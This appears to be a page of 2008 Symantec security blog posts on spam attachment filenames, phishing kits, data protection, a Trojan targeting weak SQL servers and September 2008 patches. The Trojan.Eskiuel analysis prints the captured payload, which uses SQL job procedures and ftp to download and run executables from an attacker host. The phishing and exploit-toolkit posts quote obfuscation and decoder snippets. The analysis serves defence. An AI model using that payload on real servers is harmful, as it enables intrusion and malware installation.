Security
Print version
PDF versionCutting Edge - By Engineers, For Engineers
This year's theme is "How We Win," and there are three key areas where we see this taking shape. First, we must highlight the Symantec innovation model, which is a balance between organic innovation and innovation by acquisition of leading technologies. Second, the direction of our innovations must be driven first and foremost by our customers. Our customers are telling us that they like our products, and we must continue to listen to their needs and include features to help them do their business better. Third, making our products work together is a priority among our product groups. Many people in the Cutting Edge sessions mentioned that the way we want to get products to work together better is by utilizing the Symantec Open Collaborative Architecture (OCA). The Symantec OCA enables collaboration among Symantec products (and third party products) in several ways: through exposing web services, by utilizing the mature and polished Symantec Management platform and by utilizing the Symantec Workflow engine.
* * *
Random Cutting Edge observations: watching four wild and crazy guys playing Rock Band and capturing at least two "entertaining" videos of the entire performance at the Tuesday night reception was a sight to behold (and to laugh at as well). Engineers congregated around the various exhibits and seemed to be in their element and enjoying themselves.
Overall, it was a fantastic start and made all of the hard work and preparations worthwhile. "A conference by engineers, for engineers" is our mantra, and the event gets better each year.
The (File)Name Game!
Digging into our honeypots and spam-trap systems to look for malicious attachments is always an interesting exercise. We can identify different spam campaigns and map together malicious binaries by correlating attachments and filenames. Nevertheless, it's also funny to see how the bad guys are still trying to entice users to run executable attachments-pushing their creativity and social engineering skills to extreme levels. Invoices, contracts, delivery notices, and all types of tickets are travelling by mail everyday, hitting millions of mailboxes; all in the hope that a few users, sooner or later, will be fooled by a perfectly orchestrated malicious e-mail (yes, it does still work, and old tricks are always the best).
Just for fun, I tried to create a picture of the breakdown of the most common malicious spam campaign observed on a set of emails received during the month of September. As you will notice from the chart below, the "Fees_2008-2009" attachment is still the most prevalent, followed closely by "e-card" and various "video codec" Trojans. A series of fake "Contract, Abstract, and Approved" Trojan files are also making the rounds these days.
Looking from a different perspective, we can still gather interesting information about filenames commonly used by malicious program by digging into generic antivirus detections. Many of these malicious binaries are compressed or encrypted with custom-made packers, often armored with exotic anti-emulation and somewhat funny anti-debugging tricks to evade antivirus detections. Using the polymorphic abilities of a packer, the bad guys generate hundreds of different samples from a single malicious executable in order to minimize the chance of being detected. These bad packers-used only by malicious programs-are very common for a lot of different Trojans and misleading applications, which jump from one packer variant to another every time they are detected by generic detections.
Generic antivirus detections for files created by bad packers are frequently released for our products with the prefix name of "Packed.Generic." It is nice to see a single generic detection catching thousands of different malicious samples in one shot, as shown by the chart below, calculated only during the month of September. Spikes in volumes usually occur either when a new spam campaign starts, or when there's a shift in the threat landscape (with a malicious code family moving from one packer to another).
Packed.Generic detections are also useful for identifying different malware families that share the same bad packer. I always wonder if this fact means that there's a single guy behind the distribution of different Trojans, or if it's just a coincidence.
Here are some filename statistics related to some of our recent generic detections having good hits recently:
Name: Packed.Generic.177
Description: Commonly used by misleading applications such as AntiVirus2008,
AntiVirus2009, AntiVirusXP2008 and their Downloaders.
Filenames:
av2009.exe
av2008xp.exe
AV2009Install_*.exe (e.g. AV2009Install_880401.exe)
xpa.exe
skypecomm.dll
winsrc.dll
Name: Packed.Generic.186
Description: Commonly used by Trojan.Blusod, Trojan.Fakeavalert and Downloaders.
Filenames:
InstallAntivirus_trXP.exe
lphc*.exe (e.g. lphcjooj0ecg4.exe)
mssadv_sp.exe
Name: Packed.Generic.187
Description: Used by AntiVirus2009 droppers and Downloaders.
Filenames:
A9installer_*.exe (e.g. A9installer_770522157731.exe)
MultyCodecUpgr*.exe (e.g. MultyCodecUpgr.7.20765.exe)
av2009.exe
Contract.doc.exe
Approved.doc.exe
msxml71.dll
video*.cfg.exe (e.g. video1055.cfg.exe)
video(*).cfg (e.g. video1054.cfg)
Name: Packed.Generic.188
Description: Used by Trojan.Blusod, Backdoor.Tidserv and AntiVirus2008.
Filenames:
lphc*.exe (e.g. lphcjooj0ecg4.exe)
AV2008install.exe
file.exe
.tt4.tmp
scan.exe
TDSS*.tmp
TDSS*.dll
Regardless of the spam campaign, filenames, and/or packer used, the thing that you may have noticed these days is the fact that pretty much all of these malicious emails and samples are somehow related to misleading applications. In most cases, these misleading apps end up downloading and installing an antivirus clone program or a fake security product. So, now that you know the common filenames used by the bad guys these days, watch what you click when you receive your next email!
How We Win - Openly
Here at Cutting Edge we have a lot of exciting technological developments and innovations to share. At the top of the list for me is the Symantec Open Collaborative Architecture (OCA), which prescribes a technology direction to enable collaboration among Symantec products and third-party and partner products.
The architecture is based on a loosely coupled interoperability model that requires products to adhere to a limited set of technology requirements in order to be considered OCA-enabled. The Symantec OCA enables products to interoperate for the purpose of data/information sharing among multiple products. This allows task and operational control of one product to be initiated by another product while creating loosely integrated process automation solutions for IT domain-specific processes, as prescribed in ITIL, for example. Working across IT domains, sharing and exchanging data, and enabling automation all contribute to greater cost effectiveness and risk management for the enterprise.
Open Collaborative Architecture is neither a product nor a solution in itself and cannot be purchased independently of the products that adopt its technologies. The idea is to prescribe an evolutionary approach to interoperability and solution construction, building on the Altiris solution model that is available today. As a common solutions and software architecture, the OCA enables various forms and multiple models for interoperability, none of which are mutually exclusive.
Using standard technologies around web services, web-based security, workflow management, and configuration management, the OCA provides greater flexibility and openness to build complex, multi-disciplinary, and multi-vendor solutions that can be tailored to meet specific business needs.
It's All About Reputation
Unlike traditional antivirus, all of our reputation data is stored in the cloud - that is, in Symantec data centers - meaning that if and when we shift to this model, we can drastically reduce the memory and performance impact of traditional antivirus software. Given this fact, the Mr. Clean approach should work just as well for a cell phone as a desktop PC.
It's different than some of the other "cloud-based AV" systems that are being announced, in that it can detect and protect against entirely new malicious code - even malicious code on just one person's PC that's never been seen by a security company. From what I've read, these other systems still rely on fingerprints to detect new malware. They're just hosting some of those fingerprints on servers instead of on your PC. (This is only my speculation, so take it with a grain of salt.)
We're not quite ready to completely replace our traditional antivirus technology, but soon we hope to release hybrid security products that leverage both old and new techniques. I'd be proud for Symantec to be the first company to finally kick the fingerprint habit.
In any case, I'm expecting a fair amount of spirited debate about the results. I'm not expecting too many people to defend traditional fingerprinting, however. Symantec's R&D leaders long ago agreed that this model is destined for the way of T-rex and Triceratops.
Losing Touch with Fingerprinting
Unfortunately, while the industry had its head down honing the blacklisting approach (Symantec can automatically analyze and fingerprint up to 6M samples per week - how's that for honing?), the rest of the world changed. Recent Symantec studies show that the volume of malware released now outpaces good software (potentially representing up to 65% of all unique software apps). Furthermore, industry reviews show that many new malware programs slip past all major antivirus products - it often takes days or weeks for antivirus vendors to catch up and protect against a newly released threat. And, some threats never get detected - a threat that's personalized by an attack server for a single user may never be discovered by security vendors!
And of course, while we could just ratchet up the model and ship 20, 30, or 50 thousand fingerprints per day to customers, before long you'll have no RAM left to run legitimate software. The model is close to being broken. Fortunately, Symantec's been anticipating this problem for a long time. In fact, we started working on a replacement approach to classic blacklisting about two years ago.
This Cutting Edge is exciting for me because for the first time we're sharing the results of our project with our colleagues, and the results are extremely promising: in many use cases it appears to be significantly better than traditional fingerprint-based antivirus software at detecting new threats. So good that the project's lead engineer, Vijay Seshadri, is afraid to publish the initial results, even internally, given the stir they might make.
Stay tuned this week for more information on Symantec's pioneering efforts in this space.
Reactive Phishing Defenses - Part 1
A "phishing kit" is small piece of software usually written in PHP, HTML, and JavaScript that mimics legitimate portals (for example, financial institution websites) in order to acquire sensitive information such as usernames, passwords, and credit card details. The phishing kits of the first generation were quite simple; the fraudster would build a login page to collect stolen information on local files, saved on the compromised web servers. As shown in the picture below, after the credentials have been saved, users are redirected to the legitimate website.
This approach has an obvious drawback: if the directory-listing feature is enabled on the web server, other Internet users (including the compromised financial institutions) would be able to read those files. The countermeasure that was adopted by the fraudsters was the usage of "drop-boxes" as shown below:
As highlighted by Andrea Del Miglio in this blog article, this way of collecting credentials is much more effective. The second generation of phishing kits I want to focus on introduced new and interesting features in order to guarantee a longer life for the attacks. Some of the features included preventing security companies from accessing the websites, which made the analysis of the deployed code much more difficult.
Because online fraud service providers usually adopt automated techniques in order to validate phishing attacks, often a fake HTTP 404 "Page Not Found" is returned in case the connection is coming from one of these security companies, as shown in the example given below. The fraudster is then notified via email when such an event occurs, allowing him or her to immediately collect all of the credentials and move the attack to a new compromised web server.
Slowing down phishing kit analysis is another objective fraudsters are trying to achieve. The sample provided in the picture below performs several iterations using the following functions in order to obfuscate the PHP source code:
eval(gzinflate(str_rot13(base64_decode('[CODE_HERE]'))))
eval(gzinflate(base64_decode('[CODE_HERE]')))
This is a similar technique that we have already noticed in web-based attacks like Neosploit, Mpack, and the recent Mebroot, where the JavaScript code is obfuscated or, in some cases, even encrypted. Phishing kit evolution does not end here. New features are constantly being developed, tested, and deployed on newly compromised web servers. Attackers are constantly proving to be fairly smart and this next generation of phishing kits is expected to spread in the wild very soon. End users who want to take extra care to protect themselves from such attacks should not trust messages coming from unknown sources and avoid visiting advertised web sites unless their origin is certain and legitimate.
Did You Catch Some Phish?
Symantec has carried out several forensics analyses in order to evaluate the distribution of phished users over the different phases described above. Specifically, I want to focus my attention on the portion of users submitting valid credentials after visiting a phishing website. The figure below illustrates this statistic in relation to a recent single attack, and I want to highlight the number of visits achieved and the exhaustive timeframe during which it has survived before being taken offline.
Over the twelve days taken into consideration in this sample, an average of 1.6% of users provided their credentials and so were successfully phished. Further Symantec analysis conducted on other recent attacks confirmed that the average percentage of users effectively phished after visiting a clone website is usually between 1% and 2%. This percentage may not seem very high, but consider an analogous phishing study completed in 2006, which provides a similar result of 2% of users effectively phished. (Gartner, November 2006) Given the technological advancements adopted over the past two years, the fact that the percentage of users being phished is, unfortunately, remaining relatively stable is of some concern. On the other hand, there are more phishing websites and an increased amount of phishing attacks these days; therefore there is a much larger pool of potential victims of phishing threats. These facts point to some success for different protection software (e.g. browser toolbars, anti-phishing software) that warns web visitors about the potential threats of particular websites, and/or an increase of more web-conscious users that are wary of suspicious URL they are visiting.
These statistics highlight, once again, how important is to continue encouraging end users to practice safe online behaviors; that is, invite them to ensure the validity of the web application they are using as well as the legitimacy of the SSL certificate. In addition, it is just as important to assist them in taking care of their end points by recommending the usage of software that is capable of protecting against the latest online threats-for example, many financial institutions have already started providing discounted consumer protection software to their customers. There is still a requirement for further technical advancement and also increased education for end users so that we can all continue to combat phishing threats.
Risk Management and Data Protection
Warren Buffet
The idea of risk management is in the news lately, given the turmoil in the financial markets. Working in data protection, we think long and hard about risk management. Our data protection products give an enterprise significant protection in the case of an actual disaster, man-made or otherwise. Disasters, while an important factor when considering data protection in an enterprise, are in actuality low probability/high impact events. The 2007 Symantec State of the Data Center report shows that datacenter managers know that downtime is not generally caused by a disaster.
Chief reasons for downtime
As you can see, in the data center the "tide" that goes out is often just a human error or a hardware failure. There is a lot of supporting evidence that correlates this. For instance, in a recent survey of NetBackup users, we found overwhelming evidence that restore requests are primarily due to an individual user deleting files or directories. You can't protect yourself from human error by simply relying on hosted services. Even highly reliable "storage cloud" or hosted services can experience significant outages, which can often be traced to human errors. Do an Internet search on "cloud outage" if you have doubts.
When I mull this over I come to two conclusions. First, when it comes to backup and recovery operations, you want the process to be as automated as possible. This requires a central catalog managing the process so that no one has to remember how to properly restore the data correctly. You probably need to restore data because of human error already, why introduce the possibility of more human error during restore? Secondly, when you decide on data protection architectures, both the strategies and the return on investment calculations have to factor in both the low probability/high risk events like a natural disaster, but also the high probability daily events of human error.
All Your (Data)base Are Belong to Trojan.Eskiuel
Modern SQL databases are flexible, efficient, and can run commands at an OS level easily-a perfect target from a malicious code perspective! Our honeypot servers are full of plenty of worms that spread by email, IM, file-sharing, or network vulnerabilities, so finding a Trojan that targets SQL databases is always an unusual surprise for a virus researcher.
Some of you may remember the W32.SQLExp.Worm back in 2003-it was a bad worm that tried to exploit a vulnerability in SQL servers in order to spread. Similar threats exist, such as Hacktool.SQLck and various security assessment tools like SQL Ninja.
This time we have found a new SQL threat: Trojan.Eskiuel. The main functionality of this threat is to scan the Internet to find machines with poorly configured SQL servers (i.e. with weak or non-existing passwords), gain access to them, and use their stored procedures in order to download new malware from a remote host.
The anatomy of the attack is pretty simple. When run, the threat will read the IP address passed as an input parameter in the command line, and will start scanning all of the class B subnet of that IP address, looking for an SQL server.
Image 1: The threat is scanning the local subnet looking for SQL servers and it found one on the local machine (the computer is running a test SQL server with a weak password).
Once an SQL server is located, the Trojan will run a bruteforce attack on some common weak passwords for the administrator "sa" account. Note that the threat does not try to exploit any vulnerability, it is only trying to take advantage of SQL servers that may not be properly configured. When a weak password is found, the Trojan will log into the SQL server with full administrator rights.
Image 2: The threat was able to gain access to the SQL server and is now running commands and stored procedures in administrator mode.
At this point, the threat will be able to send commands for executing some common SQL stored procedures. In particular, it will disable some security settings and will use the stored procedure sp_add_jobstep in order to run a batch script, which is the real malicious payload.
Image 3: Network capture of the malicious Query Packed, which is used to run the sp_add_jobstep procedure to inject the batch script.
Normally the xp_cmdshell stored procedure is used in these kind of attacks and it is usually recommended that this procedure is removed from the server, unless it is absolutely necessary to have it. However, the sp_add_jobstep is a less common procedure, so there may be a better chance to find it and use it on a server, even though it is a little more tricky to use. The threat will need to modify the registry value HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines\SandBoxMode in order to lower the security settings of the server and to be able to run unsafe code. The core payload is the following (a text dump of the data take in the network capture in Image 3):
exec sp_add_job 'ux';
exec sp_add_jobstep Null,'ux',Null,'1','CMDEXEC','Cmd /c Copy ias\dnary.mdb dnary.mdb&del ias\ias.mdb&del ias\dnary.mdb&Start net1 stop sharedaccess&md ZeHin&cd ZeHin&del *.* /f /s /q&Cacls %windir%\system32\ftp.exe /c /e /p EveryOne:F&echo open SuperQ.Vicp.Cc>k.x&echo new>>k.x&echo 123>>k.x&echo mget *.exe>>k.x&echo bye>>k.x&ftp -i -s:k.x&del k.x&Cacls %windir%\system32\ftp.exe /C /E /P EveryOne:N&echo for %%i in (*.exe) do start %%i>DoIt.bat&DoIt.bat&ping -n 10 127.0.0.1&DoIt.bat&del DoIt.bat';
exec sp_add_jobserver Null,'ux',Null;
exec sp_start_job 'ux';
The batch script will disable the security settings (firewall, remote access policies), and will use the system's ftp.exe program to download and run several executables from a remote host.
Image 4: The threat was able to run the batch script and open an ftp connection towards a malicious IP, from which it will download several malicious files.
Machines with a badly configured SQL server are exposed to this threat, which can attack the servers both locally or remotely. Standard good security practices are advised to tackle this risk: set a strong password for the SQL server administrator account, block access to the server from unrequired networks, and properly configure access rights for the stored procedures.
Recent Microsoft Vulnerability Exploited in the Wild
The exploits that we have been finding so far are distributed in two major ways. One is that they are simply cleartext. That is, they are not obfuscated in any way, but are effectively the same as the public exploit, with attacker-supplied shellcode substituted for the sample shellcode in the public exploit. The second method that we are seeing the exploit is encoded in a fairly wildly deployed toolkit that seems to be called e2.
This e2 attack toolkit is a system that appends its first stage-encrypted block to an otherwise legitimate web page to begin its attack. It is detected by existing IPS signatures as HTTP Malicious Toolkit Variant Activity. This first stage will then redirect the user to either an intermediary redirector, or directly to the attack page. In either case, the result is the same-the user will eventually arrive at the e2 attack page. The e2 encryptor is much like later versions of Mpack, in that an encrypted block is fed to a two-key decoder. By this, I do not mean that it is using a public key variant, but rather a decoder that takes the following form:
String.fromCharCode(key2 ^(key1 ^ encodedString.charCodeAt(i)
(Where key2 and key1 vary.)
Users of NAV/NIS 2008/2009 or N360v2 will notice this attack to be detected as MSIE MS Windows Media Encoder BO. Because this signature is immune to iterations of encoders used on the exploit, future iterations of the exploit encoding will also be detected without need for a signature update.
Users of other versions of IPS-enabled products (SCS/SEP and pre-2008 versions of products) will notice that the above attacks are detected as HTTP Windows Media Encoder ActiveX BO.
Top Data Protection Myths - Myth 6
Just in time for VMworld this week, I'd like to debunk one last myth around data protection-the myth that virtual machines automatically require an additional set of tools to properly protect them. The move to virtual environments and all of the benefits they afford has been widely addressed. However, a recent Symantec survey found that of all the customers planning a move to virtual environments, over 65% were re-examining their data protection strategy.
Sounds like increased complexity, doesn't it? Isn't the potential for less complexity one of the major value propositions of moving to a virtual server infrastructure? We think that with the right strategy, IT groups can implement a data protection strategy that will protect both physical and virtual environments from a single solution-moving away from complexity and taking a step toward simplification.
As the adoption of virtual technologies increases, businesses must take a look at the tools and technologies for backing up and restoring these virtual machines as well as the data stored on them. While traditional approaches to backup and recovery in the physical world sometimes do not always translate well to virtual infrastructures, there are advanced options today that allow organizations to easily protect their data and systems in a physical and virtual environment through a single simplified solution. Advanced technologies can also reduce complexity by enabling users to backup an unlimited number of guest machines within a host environment to disk or tape from a single agent.
A number of tools also provide for automatic discovery of virtual machines. This capability is often offered as part of the backup policy to make it easier for administrators to select specific or all virtual machines associated with an enterprise-level virtualization technology.
With the right strategy for protecting data and systems within both a physical and virtual environment, organizations can adopt a fast, low-impact approach that will reduce the challenges involved with data protection on virtual machines.
Top Data Protection Myths - Myth 5
Myth #5: Data Protection is Just Backup
As we make our way through common data protection myths, we have talked quite a bit about how innovation has advanced data protection technologies over the last few years. In fact, until fairly recently data protection was all about backup. How fast can we backup our data? What is the success rate of backups? These were the primary concerns for IT administrators.
Now, recovery is the star of the show. It's not simply about backing up the data. The data must be recoverable-usually quickly and at the right granularity. Therefore, recovery is largely viewed as the most important aspect of data protection. If an organization cannot recover the data when they need it, what is the point of backing it up in the first place?
Here's an example. Imagine that you are a small business that relies heavily on IT functions for sales, operations, and day-to-day communication. Perhaps you run a law firm and need to produce a specific file or email for a court case. That small amount of data must be recovered. And, depending on your deadline, you need the ability to do it quickly.
As I've mentioned throughout this series, the tolerance for data loss in today's environment is minimal-even for the smallest organizations-but that low tolerance (and the speed at which it is recovered) is only part of the larger recovery equation.
The other challenge is the growing importance of granular recovery, which is the need to recover a single document, file, or piece of data. Advanced granular recovery technologies allow users to protect data with a single-pass backup but recover data at either the granular, file-level or image level. This technology is available for file systems as well as Microsoft Exchange, SharePoint, Active Directory as well as virtual environments.
The number of recovery scenarios is always becoming more complicated. If granular recovery is at one end of the spectrum, the other might be complete system recovery, otherwise known as "bare metal recovery." Integrated system recovery technologies can leverage single-pass backups for fast, yet comprehensive system recovery-even in dissimilar hardware environments.
With these new technologies-and new demands-the emphasis has shifted. Backup performance used to be the primary consideration when selecting a backup product. While backup performance is still a major factor when considering a solution, it's really all about recovery today. And, the recovery needs of organizations can vary greatly based on the organization and the scenario.
Tomorrow, we'll close out our series by debunking myths around virtual machine backups.
Top Data Protection Myths - Myth 4
Myth 4: Granular Level Recovery Takes Too Long
In Myth #2 we talked about granular recovery as a main driver for implementing disk into the backup infrastructure and a good way to help IT meet today's RPOs and RTOs. As I mentioned, granular level recovery is one technology that enables IT to meet those RTOs and RPOs. However, I didn't talk about some of the perceived challenges of granular level recovery, so I'd like to debunk the myth that it takes too long to restore data at this level.
Advanced granular recovery technology enables businesses to quickly restore individual emails, files, or documents from one backup pass, saving significant time and money. Up until now, backup and recovery procedures have been arduous, requiring multiple agents and multiple backups. For example, here is what might be required on an Exchange server:
* Full database backup - so a full recovery of the Exchange server could be performed if needed.
* Granular recovery of Exchange - via a mailbox, or "brick-level" backup. MAPI technology means this backup can take up to four times longer than a whole database backup.
* Incremental backups of the database and mailbox each night.
The problem with this scenario? Multiple backups lead to massive storage and time consumption, which can be a nightmare to manage. And, let's not forget the unpleasant mechanics of traditional message-level recovery for points one and three above if mailbox-level backups are too painful to implement, forcing the need to recover to a recovery storage group first. This is a gross inefficiency of time spent and storage consumed.
Here's another scenario that illustrates the shortcomings of some of the traditional backup and recovery procedures: let's say need to quickly produce (within 24 hours) an email that was sent last week. Your recovery solution may have the data, but there is no way you can meet your recovery deadline. With granular recovery technology, it is much easier than it sounds. It is not difficult to implement and it provides an easy approach for quick recovery. Administrators have quick and random access to backups performed to a disk. For example, an Exchange administrator can browse a backup set just like browsing Exchange and select the items to restore-even down to the individual email.
Check back for here for the last two blogs in our series debunking common data protection myths.Message Edited by SR Blog Moderator on 09-10-2008 02:20 PM
Warning: Portuguese Spam Masquerading as Official Symantec Email
We have observed a fraudulent spam attack masquerading as an email from Symantec. This email is in Portuguese and contains the Symantec logo and coloring, which make it appear as a legitimate email from Symantec. The "From" line is forged to add further credibility. The "Subject" and "From" lines appear as follows:
Subject: Security Check
From: SYMANTEC
Needless to say, this is not from Symantec. The body of the message contains text that indicates that the Symantec Security Check System has tested your computer and found "X" number of dangerous imperfections. The email goes on to say that your computer is infected with the virus "Worm@bda.267." Users are encouraged to click the provided link to download updates to protect their systems from further damage from this worm. Incidentally, there is no such virus as Worm@bda.267.
If the link is clicked, the virus will be downloaded onto the victim's computer. Spammers are using a social engineering technique by leveraging the reputation that Symantec has for antivirus. The spammers are also banking on the hope that if Symantec tells you that you have a virus and provides a link to download protection, you might just click it.
The body of the email looks like the following:
One interesting thing about this attack is the use of "recycling" by the spammers. We've seen this exact spam attack before, but not for approximately two years or so. The spam message back then was also in Portuguese and had an almost identical body to this more recent spam. In the previous attack the payload was a downloader, but it is interesting to see that spammers are recycling nearly identical messages several years apart
This is one trick that you shouldn't fall for. When receiving any emails from any reputable company, always check the headers to verify that they match the company that the message is supposedly coming from. This is especially important in the current flurry of virus emails and if you're ever in doubt, it doesn't hurt to send an email or make a phone call-check with the (supposed) sender of the message to make sure that it is legitimate.
Top Data Protection Myths - Myth 3
Myth 3: Upgrading to a New Data Protection Solution is Painful and Expensive
In part three of our series on data protection myths, I thought we could take a look at the dreaded upgrade. Upgrading your data protection software is generally perceived as a painful process among the IT crowd. At the same time, that crowd is seeing the need to upgrade. Gartner research from July 2008 proved this. In a survey of 70 IT managers, 66% of respondents said they were planning major redesigns of backup and recovery systems within 12 months, according to analyst Alan Dayley. That is a lot of frustrated IT managers.
Fortunately, we think this is yet another data protection myth. While the process might seem daunting, in actuality, upgrading to the right solution will eliminate headaches in the long run. Today's data protection technology will save time and money. IT professionals are beginning to realize that outdated backup software can't handle the RTO and RPO demands of today, as well as the ever increasing amounts of data that exist in the typical organization.
What users might not realize is that newer data protection technologies leverage lifecycle management technology for the data protection infrastructure itself, which makes it much easier for IT administrators to upgrade old versions from years ago to the latest solutions. With the right infrastructure management tools, an overhaul might not be as painful as users think.
While some IT organizations prefer to keep old versions of their backup and recovery solutions, upgrading can provide significant benefits by using newer technology that will ultimately save them time and money. Also, big vendors usually have solutions optimized for a specific market segment and priced accordingly, so SMBs can reap similar benefits to an enterprise at a price point more specific to an SMB size. Customers who may be using a very old version of a product are frequently faced with the unpleasant scenario of how to get from "A" to "E." Innovative data protection solutions can virtually eliminate the pain of a very manual process. Imagine all the man-hours that could be recaptured if the process of automating the patching and upgrading of a data protection infrastructure were streamlined.
We'll be back tomorrow with Myth #4 about granular level recovery.
Microsoft Patch Tuesday for September 2008
Hello and welcome to this month's blog on the Microsoft patch releases. This is a relatively light month, with four bulletins covering eight vulnerabilities.
All of the vulnerabilities this month are client-side issues rated "critical." Five of the issues affect the GDI+ graphics library; the rest affect Media Player, Microsoft Office, and Media Encoder. All of the issues have the potential to see active exploits, but the GDI+ vulnerabilities have the most avenues of attack and affect the most systems. The OneNote protocol handler vulnerability is fairly trivial to exploit.
As always, customers are advised to follow these security best practices:
- Never open files from unknown or questionable sources.
- Run all client software with the least privileges required while still maintaining functionality.
Microsoft's summary of the September releases can be found here: http://www.microsoft.com/technet/security/bulletin/ms08-sep.mspx
1. MS08-052 Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593)
CVE-2007-5348 (BID 30138) Microsoft Windows GDI+ VML Heap-Based Buffer Overflow Vulnerability (MS Rating: Critical / Symantec Urgency Rating 7.1/10)
A remote code-execution vulnerability affects GDI+ when handling gradient sizes. An attacker must trick a victim into visiting a Web site containing malicious content, opening a malicious email, or into opening a malicious image file to exploit this issue. A successful attack will result in the execution of arbitrary code in the context of the currently logged-in user.
Affects: Microsoft Internet Explorer 6, Windows XP SP2 and SP3, Windows XP Professional x64 Edition, Windows XP Professional x64 Edition SP2, Windows Server 2003 SP1 and SP2, Windows Server 2003 x64 Edition, Windows Server 2003 x64 Edition SP2, Windows Server 2003 with SP1 and SP2 for Itanium-based Systems, Windows Vista, Windows Vista SP1, Windows Vista x64 Edition, Windows Vista x64 Edition SP1, Windows Server 2008 for 32-bit Systems*, x64-based Systems*, and Itanium-based Systems, Microsoft Office XP SP3, Microsoft Office 2003 SP2 and SP3, 2007 Microsoft Office System, 2007 Microsoft Office System SP1, Microsoft Visio 2002 SP2, Microsoft Office PowerPoint Viewer 2003, Microsoft Works 8, Microsoft Digital Image Suite 2006, SQL 2000 Reporting Services SP2, SQL Server 2005 SP2, SQL Server 2005 x64 Edition SP2, SQL Server 2005 for Itanium-based Systems SP2, Microsoft Report Viewer 2005 SP1 Redistributable Package, Microsoft Report Viewer 2008 Redistributable Package, and Microsoft Forefront Client Security 1.0
CVE-2008-3012 (BID 31019) Microsoft GDI+ EMF Image Processing Memory Corruption Vulnerability (MS Rating: Critical / Symantec Urgency Rating 7.1/10)
A remote code-execution vulnerability affects GDI+ when handling memory allocation. An attacker must trick a victim into visiting a Web site containing malicious content or into opening a malicious EMF image file to exploit this issue. A successful attack will result in the execution of arbitrary code in the context of the currently logged-in user.
Affects: Microsoft Internet Explorer 6, Windows XP SP2 and SP3, Windows XP Professional x64 Edition, Windows XP Professional x64 Edition SP2, Windows Server 2003 SP1 and SP2, Windows Server 2003 x64 Edition, Windows Server 2003 x64 Edition SP2, Windows Server 2003 with SP1 and SP2 for Itanium-based Systems, Windows Vista, Windows Vista SP1, Windows Vista x64 Edition, Windows Vista x64 Edition SP1, Windows Server 2008 for 32-bit Systems*, x64-based Systems*, and Itanium-based Systems, Microsoft Office XP SP3, Microsoft Office 2003 SP2 and SP3, 2007 Microsoft Office System, 2007 Microsoft Office System SP1, Microsoft Visio 2002 SP2, Microsoft Office PowerPoint Viewer 2003, Microsoft Works 8, Microsoft Digital Image Suite 2006, SQL 2000 Reporting Services SP2, SQL Server 2005 SP2, SQL Server 2005 x64 Edition SP2, SQL Server 2005 for Itanium-based Systems SP2, Microsoft Report Viewer 2005 SP1 Redistributable Package, Microsoft Report Viewer 2008 Redistributable Package, and Microsoft Forefront Client Security 1.0
CVE-2008-3013 (BID 31020) Microsoft GDI+ GIF File Parsing Remote Code Execution Vulnerability (MS Rating: Critical / Symantec Urgency Rating 7.1/10)
A remote code-execution vulnerability affects GDI+ when parsing indexes in specially crafted GIF image files. An attacker must trick a victim into viewing a Web site containing malicious content or into opening a malicious image file to exploit this issue. A successful attack will result in the execution of arbitrary code in the context of the currently logged-in user.
Affects: Microsoft Internet Explorer 6, Windows XP SP2 and SP3, Windows XP Professional x64 Edition, Windows XP Professional x64 Edition SP2, Windows Server 2003 SP1 and SP2, Windows Server 2003 x64 Edition, Windows Server 2003 x64 Edition SP2, Windows Server 2003 with SP1 and SP2 for Itanium-based Systems, Windows Vista, Windows Vista SP1, Windows Vista x64 Edition, Windows Vista x64 Edition SP1, Windows Server 2008 for 32-bit Systems*, x64-based Systems*, and Itanium-based Systems, Microsoft Office XP SP3, Microsoft Office 2003 SP2 and SP3, 2007 Microsoft Office System, 2007 Microsoft Office System SP1, Microsoft Visio 2002 SP2, Microsoft Office PowerPoint Viewer 2003, Microsoft Works 8, Microsoft Digital Image Suite 2006, SQL 2000 Reporting Services SP2, SQL Server 2005 SP2, SQL Server 2005 x64 Edition SP2, SQL Server 2005 for Itanium-based Systems SP2, Microsoft Report Viewer 2005 SP1 Redistributable Package, Microsoft Report Viewer 2008 Redistributable Package, and Microsoft Forefront Client Security 1.0
CVE-2008-3014 (BID 31021) Microsoft GDI+ WMF Image File Buffer Overflow Vulnerability (MS Rating: Critical / Symantec Urgency Rating 7.1/10)
A remote code-execution vulnerability affects GDI+ when allocating memory for WMF image files. An attacker must trick a victim into viewing a Web site containing malicious content or into opening a malicious image file to exploit this issue. A successful attack will result in the execution of arbitrary code in the context of the currently logged-in user.
Affects: Microsoft Internet Explorer 6, Windows XP SP2 and SP3, Windows XP Professional x64 Edition, Windows XP Professional x64 Edition SP2, Windows Server 2003 SP1 and SP2, Windows Server 2003 x64 Edition, Windows Server 2003 x64 Edition SP2, Windows Server 2003 with SP1 and SP2 for Itanium-based Systems, Windows Vista, Windows Vista SP1, Windows Vista x64 Edition, Windows Vista x64 Edition SP1, Windows Server 2008 for 32-bit Systems*, x64-based Systems*, and Itanium-based Systems, Microsoft Office XP SP3, Microsoft Office 2003 SP2 and SP3, 2007 Microsoft Office System, 2007 Microsoft Office System SP1, Microsoft Visio 2002 SP2, Microsoft Office PowerPoint Viewer 2003, Microsoft Works 8, Microsoft Digital Image Suite 2006, SQL 2000 Reporting Services SP2, SQL Server 2005 SP2, SQL Server 2005 x64 Edition SP2, SQL Server 2005 for Itanium-based Systems SP2, Microsoft Report Viewer 2005 SP1 Redistributable Package, Microsoft Report Viewer 2008 Redistributable Package, and Microsoft Forefront Client Security 1.0
CVE-2008-3015 (BID 31022) Microsoft GDI+ BMP Integer Overflow Vulnerability (MS Rating: Critical / Symantec Urgency Rating 7.1/10)
A remote code-execution vulnerability affects GDI+ when handling integer calculations. An attacker must trick a victim into viewing a Web site containing malicious content, or into opening a malicious BMP image file to exploit this issue. A successful attack will result in the execution of arbitrary code in the context of the currently logged-in user.
Affects: Microsoft Office XP SP3, Microsoft Office 2003 SP2 and SP3, 2007 Microsoft Office System, 2007 Microsoft Office System SP1, Microsoft Visio 2002 SP2, Microsoft Office PowerPoint Viewer 2003, Microsoft Works 8, Microsoft Digital Image Suite 2006, SQL 2000 Reporting Services SP2, SQL Server 2005 SP2, SQL Server 2005 x64 Edition SP2, SQL Server 2005 for Itanium-based Systems SP2, Microsoft Report Viewer 2005 SP1 Redistributable Package, Microsoft Report Viewer 2008 Redistributable Package, and Microsoft Forefront Client Security 1.0
2. MS08-054 Vulnerability in Windows Media Player Could Allow Remote Code Execution (954154)
CVE-2008-2253 (BID 30550) Microsoft Windows Media Player SSPL File Sample Rate Remote Code-Execution Vulnerability (MS Rating: Critical / Symantec Urgency Rating 7.1/10)
